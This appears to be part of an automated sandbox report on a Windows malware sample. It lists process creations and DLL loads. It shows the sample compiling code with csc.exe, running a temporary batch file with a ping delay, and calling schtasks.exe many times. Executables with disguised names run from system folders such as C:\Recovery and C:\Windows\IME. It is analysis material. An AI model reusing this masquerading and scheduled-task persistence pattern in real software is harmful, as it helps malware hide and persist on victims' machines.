                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe "C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe"
                            Source: unknownProcess created: C:\Recovery\upfc.exe "C:\Recovery\upfc.exe"
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ecdbob4x\ecdbob4x.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ftydHX0xsT.bat" Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE7C8.tmp" "c:\Windows\System32\CSC3F2531052F24CCCAD119855F7C96013.TMP"Jump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe "C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exe"
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\m4n1AQRhaP.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: version.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: version.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Recovery\iHstGpVMr4QFhc62UUbis.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: mscoree.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: apphelp.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: version.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: wldp.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: profapi.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: mscoree.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: version.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: wldp.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: profapi.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: sspicli.dll
                            Source: C:\Recovery\upfc.exeSection loaded: mscoree.dll
                            Source: C:\Recovery\upfc.exeSection loaded: apphelp.dll
                            Source: C:\Recovery\upfc.exeSection loaded: kernel.appcore.dll
                            Source: C:\Recovery\upfc.exeSection loaded: version.dll
                            Source: C:\Recovery\upfc.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Recovery\upfc.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\upfc.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\upfc.exeSection loaded: windows.storage.dll
                            Source: C:\Recovery\upfc.exeSection loaded: wldp.dll
                            Source: C:\Recovery\upfc.exeSection loaded: profapi.dll
                            Source: C:\Recovery\upfc.exeSection loaded: cryptsp.dll
                            Source: C:\Recovery\upfc.exeSection loaded: rsaenh.dll
                            Source: C:\Recovery\upfc.exeSection loaded: cryptbase.dll
                            Source: C:\Recovery\upfc.exeSection loaded: sspicli.dll
                            Source: C:\Recovery\upfc.exeSection loaded: mscoree.dll
                            Source: C:\Recovery\upfc.exeSection loaded: kernel.appcore.dll
                            Source: C:\Recovery\upfc.exeSection loaded: version.dll
                            Source: C:\Recovery\upfc.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Recovery\upfc.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\upfc.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\upfc.exeSection loaded: windows.storage.dll
                            Source: C:\Recovery\upfc.exeSection loaded: wldp.dll
                            Source: C:\Recovery\upfc.exeSection loaded: profapi.dll
                            Source: C:\Recovery\upfc.exeSection loaded: cryptsp.dll
                            Source: C:\Recovery\upfc.exeSection loaded: rsaenh.dll
                            Source: C:\Recovery\upfc.exeSection loaded: cryptbase.dll
                            Source: C:\Recovery\upfc.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: mscoree.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: apphelp.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: version.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: wldp.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: profapi.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: sspicli.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: mscoree.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: version.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: wldp.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: profapi.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\bcastdvr\uwTuxQS3V.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: mscoree.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: apphelp.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: version.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: wldp.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: profapi.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: sspicli.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: mscoree.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: version.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: wldp.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: profapi.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\IME\en-GB\Registry.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: mscoree.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: version.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\SchCache\ikEtBZXIKU1m0Gn.exeSection loaded: wldp.dll
